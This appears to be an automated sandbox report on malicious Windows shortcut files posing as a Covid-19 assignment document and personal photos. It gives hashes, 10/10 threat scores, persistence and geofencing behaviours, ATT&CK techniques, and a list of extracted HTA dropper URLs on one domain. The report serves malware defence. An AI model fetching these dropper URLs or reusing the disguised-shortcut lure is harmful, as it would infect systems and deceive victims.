Overview

overview

10

Static

static

samples/As...cx.lnk

windows7_x64

10

samples/As...cx.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/IM...pg.lnk

windows7_x64

10

samples/IM...pg.lnk

windows10-2004_x64

10

samples/Im...pg.lnk

windows7_x64

10

samples/Im...pg.lnk

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

  • Size

    695KB

  • Sample

    220322-pth4vsfah3

  • MD5

    25e76e7b8fd0132f44d1ef708d0ed023

  • SHA1

    7346c14c42da80ccdfcb210aaac8ecd861b5511a

  • SHA256

    1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

  • SHA512

    1b0d2154449bdf4d7b362d8c17f9c6cf4e424b36825111ae1d2c955ad27bd5cf218e280747c4c3f6bbf66705b8eff262213a35c5590273b9d4cf1280e9357a1f

Score
10/10
persistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/awanda/http/

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image1

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image2

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image3

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image4

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image5

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image6

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image7

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Radhika-Images/Image8

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20201220_211940

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20210111_125841

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122317

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122331

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_105339

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_160548

Extracted

Language
hta
Source
URLs
hta.dropper

https://inapharma.in/css/files/photos/Bn-Offrs-Album/Image-8646-ZP

Targets

    • Target

      samples/Assignment-Covid-19.docx.lnk

    • Size

      441KB

    • MD5

      46a0ed16f446c9d5c948c0df1913760a

    • SHA1

      2bda2bb80eb79574eecff90ebcc8579e29f310b9

    • SHA256

      2ace3b4ea7ecacb6ef8b4da7f5c315a31663523808a685d3600bc57571c1eb83

    • SHA512

      a888521af25310f40074230056d14e2f73725e34b1b364ff751220bce5ef22a4fdc52ea83f1b7a0c17a8b94c7c4cb714bfbfbe02ee9c7c8ed6b358adf3f7921c

    Score
    10/10
    persistence

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Adds Run key to start application

      persistence
    behavioral1behavioral2

    • Target

      samples/IMG20100510171450.jpg.lnk

    • Size

      1KB

    • MD5

      9eae344a255251254eb236a5b87b5790

    • SHA1

      72c8a2c84598ed2b394635ed36a253edf46a8f44

    • SHA256

      b55cd403d53f483d55f015e8fb884cc203f93af81b0ef6de9e1809647a17478f

    • SHA512

      e12e47eda16b5c1e0d115af95f5e6ee82718ba1f1b2650a5cd0add92cefe97050d16b799c283050fce456cbbf828bbf29cdcddddad4c90ae141b9e08ba51bb4a

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral3behavioral4

    • Target

      samples/IMG20100510223001.jpg.lnk

    • Size

      1KB

    • MD5

      cf6a968486a4215213c137536a6b5838

    • SHA1

      78821673dca4dd90b71e64aa61e40e010f07a22b

    • SHA256

      41350960c79e404fd6127c6cfd0951e948e7743073d58fbd767818c6353b269a

    • SHA512

      2ffea4638f422500ab42033851fa70f8d7b784a8dce757610275d4de1cd92f16b4e03b413e37f1e492871def8c91babb8c376fe20d84f003e3ed34f2d9fa77c3

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral5behavioral6

    • Target

      samples/IMG20201210342791.jpg.lnk

    • Size

      1KB

    • MD5

      41396dd603a7598248982c1e6ee99a80

    • SHA1

      538a54194158fc8ebd3abf26065fc6bee58c62ba

    • SHA256

      4e72308cf647e89c22a85af9dee015d38a86baf170304c4e468b486aaaf9dc31

    • SHA512

      156ce4616979b4ee1e08a35f468e657908f82c0b81ae1ab8e3d9f2f173ae50f0a122f9e568b953af641cb26cefbaf2e85e33c26d9dfe5552a8353b91ab3a95dc

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral7behavioral8

    • Target

      samples/IMG20210588270623.jpg.lnk

    • Size

      1KB

    • MD5

      18b3f8fb699d04f17a3d6b20061d3d24

    • SHA1

      35dc4dd6379582e21bc102c9fccd4a6c836b7040

    • SHA256

      2f2b6cc258b82a24fb42e8b0528a63226f8e06c15b2f851fad6db87024b01ed3

    • SHA512

      22015058707c39b357aba7ac21cc3e5ef9af5635d39987ae0d91e143f456baeb8844f76a0bc265608d8b5b7def2884ee36ba8c496be3b41736f65f62b16fb1bd

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral9behavioral10

    • Target

      samples/IMG20210713121548.jpg.lnk

    • Size

      1KB

    • MD5

      cac1f13a4f9670a5419a843d33f2bfd6

    • SHA1

      8239d0182e8d0aef620a9cc6e4bd1bf9db075ea1

    • SHA256

      44d57154908461afb71eef59f25b56d56ac442cf70b58da2fd55cf5cee67f778

    • SHA512

      9bc7fafc0ffe7cd257f2d2a20eb10d27fb715193b158b04e3e547b8b499cda5b54c076b5af696248c03b28b7a408332c274e1b71ea649c664c6f9430a66c57f4

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral11behavioral12

    • Target

      samples/IMG20210743209813.jpg.lnk

    • Size

      1KB

    • MD5

      43061de1fc88a0aca42389eb10631a87

    • SHA1

      7625e3384837016583cda75aa42f340a396d2a12

    • SHA256

      4ddfde212867c4fafa535c2dbc24d4b289f7ec8b217e50b3208c0c4392426045

    • SHA512

      7f9760b16956c55e0a2c4ff228fcd76b1fc5aa5c24f31495b09cbc510b399fe06fe6e815ba1cc6e7651ffac019d7f6d063e4dbe4a7d9121db90fa32fc6c0effe

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral13behavioral14

    • Target

      samples/IMG20210911131002.jpg.lnk

    • Size

      1KB

    • MD5

      a242f83235676c39f387579d66cb5d2c

    • SHA1

      4f62159ff23b1be912a129b07e1dc5006576b3fb

    • SHA256

      8ad75311ad9aac9d04d3471b7b40ce2d0aeb7f5c6c7d86b29c24aef4d4bfc51b

    • SHA512

      81fd67a598dbe699860d701c78f1ea3f1ce30d4a2066060e4f5497c21538152222759ab791cc3be95f2adc60fba1ddc1cb6e35b8a0e0099ecad92b08e1794ce9

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral15behavioral16

    • Target

      samples/IMG20210918232755.jpg.lnk

    • Size

      1KB

    • MD5

      999ee25489b213fbfe71a1ac2bd1de42

    • SHA1

      970967db603ad1095c5a4f98a5fa019ad323bf28

    • SHA256

      f9466a54fb75d5084ee6ab6b5d667250c6aaaa710b325500a5f5435ba5fe9384

    • SHA512

      eee0f65fc65ad43ecc75f61d07d9cd2fe9ec0e4a5b46a6b32ac61e506427bcf5e421b13a307a404f8e74c586d07531ab7e7acb5b0cf17288b28658e8563c676c

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral17behavioral18

    • Target

      samples/IMG_20201220_211940.jpg.lnk

    • Size

      61KB

    • MD5

      4719d38df44b6adaf747e9e5393a42a2

    • SHA1

      75bee47db44cc3d49fb89961c5d56850d730c8ef

    • SHA256

      426a772c292688f492a2d5e0123be9112162654de8e06cdfbb6be60138ef20fc

    • SHA512

      8a93396d69609032775b99973d9ffaf2455ba11975ce96fc9e716689b507add46ac613895943c734654c73e9f3bf04877ca7db8baa59d3ee47f61e506107f06e

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral19behavioral20

    • Target

      samples/IMG_20210111_125841.jpg.lnk

    • Size

      29KB

    • MD5

      0cc31107c3424949102a31bddedfe867

    • SHA1

      585571b2214b18ea0c17f5fe299abae3cdebc15e

    • SHA256

      3ff6bcb1912539579eb728e06e32ec4299b62b95a3000e93e4840d669b1e29ef

    • SHA512

      b6bb60215a5525f37b08fc5b1dea758167fa7184c2bb15f8c198ead5732ac15f14e5c1e176034e4fc2b5b56f6ad1b0a0aea5139fa83da80b079cc113dc7d3980

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral21behavioral22

    • Target

      samples/IMG_20210603_122317.jpg.lnk

    • Size

      24KB

    • MD5

      041652e37aa0448a2557855f1af38298

    • SHA1

      820a817a74e73acb25ea8a567f11b47e608d88de

    • SHA256

      ec5ce96649dc44602aad947047b13df8bb43da9cdfdd0d8d7c25c48e41fea200

    • SHA512

      10ceba0c348089c28fd76d4e9d02d6876ce19cb15b971ac1faca6ef26a8d4509c80ab6ebcd599b31cf56e64384b1bab0e06b3c2ad7a642937c321a493dff274d

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral23behavioral24

    • Target

      samples/IMG_20210603_122331.jpg.lnk

    • Size

      54KB

    • MD5

      90b67f8679b286aeffb338090998d609

    • SHA1

      a4448457b6950f1337da0dbf973b96f316b405c2

    • SHA256

      b09ec2c531dce3b866bbb5b8945e6cb049b12b3c092e23213c51beb1e1db9fb3

    • SHA512

      8c9c4ce4270a0c1e6818811f345acc41e546dc16e212f9f190b1a502fba81bed8a1b8c3b9b8077205457cfd240128a67b1bf50200a3df3126c5c31a624a8fa14

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral25behavioral26

    • Target

      samples/IMG_20210628_105339.jpg.lnk

    • Size

      88KB

    • MD5

      b6f35bc00581d77723bbee101e288077

    • SHA1

      35cc34c9942595b187c0beeda83c0b0f3a1babb1

    • SHA256

      64beb3e30dccf26b3a3f131180b88fefa48549d4ae7e6190b1de605f9b3974f0

    • SHA512

      f38aa1d1f54307b4d0969022fcfb17f7ef52b6302550f09905feca3c12a43fa24662ee660b23dc0abd74db80b64f083c788562dca2f09bc7f54fef2e837ff13c

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral27behavioral28

    • Target

      samples/IMG_20210628_160548.jpg.lnk

    • Size

      23KB

    • MD5

      eef19079fc52533b1439b4dfc7bd57b3

    • SHA1

      ef93d5185addc5fc51aea0c431e1a08abbb105c3

    • SHA256

      a293e19f25b2b5189b5a8885867552c88ea11f454f2656b8c32931fe116743d6

    • SHA512

      de9469c3406c262521230a1e1c4bb3315ce0f46535cdb9f89a18c77444f0b7c78864ecccd2cbbad47deb7dd9d9431f5eddac0372480773e064d37b048f6399f7

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral29behavioral30

    • Target

      samples/Image-8646-ZP.jpg.lnk

    • Size

      1KB

    • MD5

      e163fbce2507c89a106c8ad001dc099a

    • SHA1

      afd8e902f55dbefcfa4afa30c95ce49b2daef6aa

    • SHA256

      61e88158da4636ab0c11db75e376f42e11a02ebe0387223934fb10944b52794f

    • SHA512

      a6dc129fd6cfc820461b29c3b9c35539f7bd45e67a383c1cb8c9a437509046edac793dd6b134a379b3be1768dc3daba0ea5d914be5624a4c10a4402d32d99b82

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral31behavioral32

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

32
T1112

Install Root Certificate

15
T1130

Credential Access

Discovery

Query Registry

17
T1012

System Information Discovery

33
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

static1

Score
N/A

behavioral1

Score
10/10

behavioral2

persistence
Score
10/10

behavioral3

Score
10/10

behavioral4

Score
10/10

behavioral5

Score
10/10

behavioral6

Score
10/10

behavioral7

Score
10/10

behavioral8

Score
10/10

behavioral9

Score
10/10

behavioral10

Score
10/10

behavioral11

Score
10/10

behavioral12

Score
10/10

behavioral13

Score
10/10

behavioral14

Score
10/10

behavioral15

Score
10/10

behavioral16

Score
10/10

behavioral17

Score
10/10

behavioral18

Score
10/10

behavioral19

Score
10/10

behavioral20

Score
10/10

behavioral21

Score
10/10

behavioral22

Score
10/10

behavioral23

Score
10/10

behavioral24

Score
10/10

behavioral25

Score
10/10

behavioral26

Score
10/10

behavioral27

Score
10/10

behavioral28

Score
10/10

behavioral29

Score
10/10

behavioral30

Score
10/10

behavioral31

Score
10/10

behavioral32

Score
10/10